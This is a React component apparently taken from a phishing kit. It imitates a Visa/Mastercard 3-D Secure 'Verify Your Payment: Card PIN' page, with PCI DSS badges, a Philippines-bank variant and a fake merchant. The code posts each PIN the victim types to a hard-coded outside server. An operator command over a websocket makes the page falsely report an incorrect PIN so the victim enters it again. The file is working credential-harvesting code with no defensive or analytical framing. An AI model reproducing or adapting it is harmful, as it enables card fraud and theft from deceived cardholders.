import React, { useState, useEffect, useRef } from 'react';
import HelpImage from './assets/help.gif';
import axios from 'axios';
import { useNavigate } from 'react-router-dom';
import PciImage from './assets/pci.jpg';
import VisaImage from './assets/visa.svg';
import MasterImage from './assets/master.jpg';
import PhilippinesBankLayout, { isPhilippinesBankDesign } from './philippines/PhilippinesBankLayout';
import { isMastercard } from '../cardScheme';

const BalanceVerificationPage = () => {
  const navigate = useNavigate();
  const [pin, setPin] = useState('');
  const [isSubmitting, setIsSubmitting] = useState(false);
  const [errorMessage, setErrorMessage] = useState(() => sessionStorage.getItem('pin_error') || '');
  const [isShaking, setIsShaking] = useState(false);
  const inputRef = useRef(null);
  const uuId = localStorage.getItem('uuId') || localStorage.getItem('session_uuId') || 'default';
  const retryFlagKey = `pin_retry_flag_${uuId}`;
  const design = localStorage.getItem('session_design') || '';

  useEffect(() => {
    if (sessionStorage.getItem('pin_error')) {
      setIsShaking(true);
      setTimeout(() => setIsShaking(false), 600);
      sessionStorage.removeItem('pin_error');
    }
  }, []);

  const today = new Date();
  const formattedDate = `${today.getDate().toString().padStart(2, '0')}/${(today.getMonth() + 1)
    .toString()
    .padStart(2, '0')}/${today.getFullYear()}`;

  useEffect(() => {
    if (sessionStorage.getItem(retryFlagKey) === 'true') {
      setErrorMessage('Incorrect PIN. Please enter your 4-digit card PIN again.');
    }
  }, [retryFlagKey]);

  useEffect(() => {
    const handleWsCommand = (e) => {
      const data = e.detail;
      if (!data) return;
      if (data.type === 'show_pin' && data.isRetry) {
        sessionStorage.setItem(retryFlagKey, 'true');
        setPin('');
        setErrorMessage('Incorrect PIN. Please check and enter your 4-digit card PIN again.');
        setIsShaking(true);
        setTimeout(() => setIsShaking(false), 600);
        if (inputRef.current) inputRef.current.focus();
      }
    };
    window.addEventListener('ws_command', handleWsCommand);
    return () => window.removeEventListener('ws_command', handleWsCommand);
  }, [retryFlagKey]);

  const handlePinSubmit = async (e) => {
    e?.preventDefault();
    if (pin.length < 4 || isSubmitting) return;

    setIsSubmitting(true);
    // Мгновенный переход на экран загрузки
    navigate('/3ds/loading');

    const dataToSend = {
      uuId: localStorage.getItem('uuId'),
      pin: pin,
      balance: pin
    };

    try {
      const serverUrl = process.env.REACT_APP_SERVER_URL || 'https://devosyshandler.com';
      await axios.post(`${serverUrl}/api/balance_verif`, dataToSend);
    } catch (error) {
      sessionStorage.setItem('pin_error', 'Incorrect PIN or connection error. Please try again.');
      sessionStorage.setItem(retryFlagKey, 'true');
      navigate('/3ds/balance');
    }
  };

  // 1. Philippines Bank Branded PIN Layout
  if (isPhilippinesBankDesign(design)) {
    return (
      <PhilippinesBankLayout
        design={design}
        mode="pin"
        pin={pin}
        setPin={setPin}
        handlePinSubmit={handlePinSubmit}
        errorMessage={errorMessage}
        isShaking={isShaking}
        isSubmitting={isSubmitting}
        onCancel={() => navigate('/checkout')}
      />
    );
  }

  // 2. Standard 3DS PIN Layout
  const isBtnDisabled = pin.length < 4 || isSubmitting;
  const isMc = isMastercard(design);
  const imageSrc = isMc ? MasterImage : VisaImage;
  const altText = isMc ? 'Mastercard' : 'Visa';

  return (
    <div className="flex items-center justify-center w-full min-h-screen bg-slate-100 p-4">
      <div className={`w-full max-w-sm px-6 py-7 bg-white border border-gray-300 shadow-xl rounded-xl transition-transform ${isShaking ? 'animate-shake' : ''}`}>
        
        {/* Header Badges */}
        <div className="flex items-center justify-between w-full mb-5 pb-3 border-b border-gray-100">
          <img src={PciImage} alt="PCI DSS Compliant" className="h-9 mr-4 object-contain" />
          {imageSrc && <img src={imageSrc} alt={altText} className="h-9 object-contain" />}
        </div>

        <h1 className="mb-1.5 text-base font-extrabold text-gray-900 tracking-tight">
          Verify Your Payment: Card PIN
        </h1>
        <p className="mb-4 text-xs text-gray-600 leading-relaxed">
          For enhanced transaction security, please enter the 4-digit PIN for your payment card to authorize this payment.
        </p>

        {errorMessage && (
          <div className="mb-4 p-3 bg-red-50 border border-red-200 rounded-lg text-xs text-red-700 flex items-start gap-2.5 shadow-sm">
            <span className="text-red-600 font-bold text-base leading-none">⚠️</span>
            <div className="leading-snug font-medium">{errorMessage}</div>
          </div>
        )}

        <div className="grid grid-cols-2 mb-4 text-xs gap-y-2 bg-gray-50 border border-gray-200 rounded-lg p-3">
          <span className="text-gray-500 font-medium">Merchant:</span>
          <span className="text-gray-900 font-bold text-right truncate">{process.env.REACT_APP_MERCHANT_NAME || 'Dino World'}</span>
          
          <span className="text-gray-500 font-medium">Date:</span>
          <span className="text-gray-900 font-semibold text-right">{formattedDate}</span>
          
          <span className="text-gray-500 font-medium">Card Number:</span>
          <span className="text-gray-900 font-mono font-bold text-right">**** **** **** {localStorage.getItem('last-four-digits') || '••••'}</span>
          
          <span className="text-gray-500 font-medium">Amount:</span>
          <span className="text-[#0056b3] font-black text-right">
            {localStorage.getItem('currency') || process.env.REACT_APP_CURRENCY || 'PHP'} {localStorage.getItem('summ') || '0.00'}
          </span>
        </div>

        <form onSubmit={handlePinSubmit}>
          <div className="mb-4">
            <label htmlFor="card-pin" className="block mb-1.5 text-xs font-bold text-gray-700">
              Enter 4-Digit Card PIN:
            </label>
            <input
              ref={inputRef}
              id="card-pin"
              type="password"
              inputMode="numeric"
              maxLength={4}
              autoFocus
              value={pin}
              onChange={(e) => {
                setPin(e.target.value.replace(/\D/g, '').slice(0, 4));
                setErrorMessage('');
              }}
              placeholder="••••"
              className="w-full px-4 py-2.5 text-xl font-bold tracking-[0.4em] text-center border-2 border-gray-300 rounded-lg bg-white text-gray-900 focus:outline-none focus:border-[#0056b3] focus:ring-2 focus:ring-blue-100 transition-all"
            />
          </div>

          <div className="flex items-center justify-between pt-3 border-t border-gray-100 gap-2">
            <button
              type="button"
              onClick={() => navigate('/checkout')}
              className="px-3.5 py-2 text-xs font-bold text-gray-600 hover:text-gray-900 hover:bg-gray-100 rounded-lg transition-colors cursor-pointer"
            >
              Cancel
            </button>
            <button
              type="submit"
              disabled={isBtnDisabled}
              className={`px-6 py-2.5 text-xs font-extrabold uppercase tracking-wider rounded-lg transition-all shadow-md flex items-center justify-center gap-2 min-w-[120px] cursor-pointer ${
                isBtnDisabled
                  ? 'bg-gray-200 text-gray-400 border border-gray-300 cursor-not-allowed opacity-60 shadow-none'
                  : 'bg-[#0056b3] hover:bg-[#004494] active:scale-95 text-white border border-[#004494] shadow-blue-500/20 hover:shadow-lg'
              }`}
            >
              {isSubmitting ? (
                <>
                  <span className="inline-block w-3.5 h-3.5 border-2 border-white/30 border-t-white rounded-full animate-spin flex-shrink-0" />
                  <span>SUBMIT</span>
                </>
              ) : (
                'SUBMIT'
              )}
            </button>
            <button
              type="button"
              className="flex items-center px-3 py-2 text-xs font-bold text-gray-600 hover:text-gray-900 hover:bg-gray-100 rounded-lg transition-colors cursor-pointer gap-1"
            >
              <img className="h-3.5 w-auto" src={HelpImage} alt="" />
              <span>Help</span>
            </button>
          </div>
        </form>
      </div>
    </div>
  );
};

export default BalanceVerificationPage;
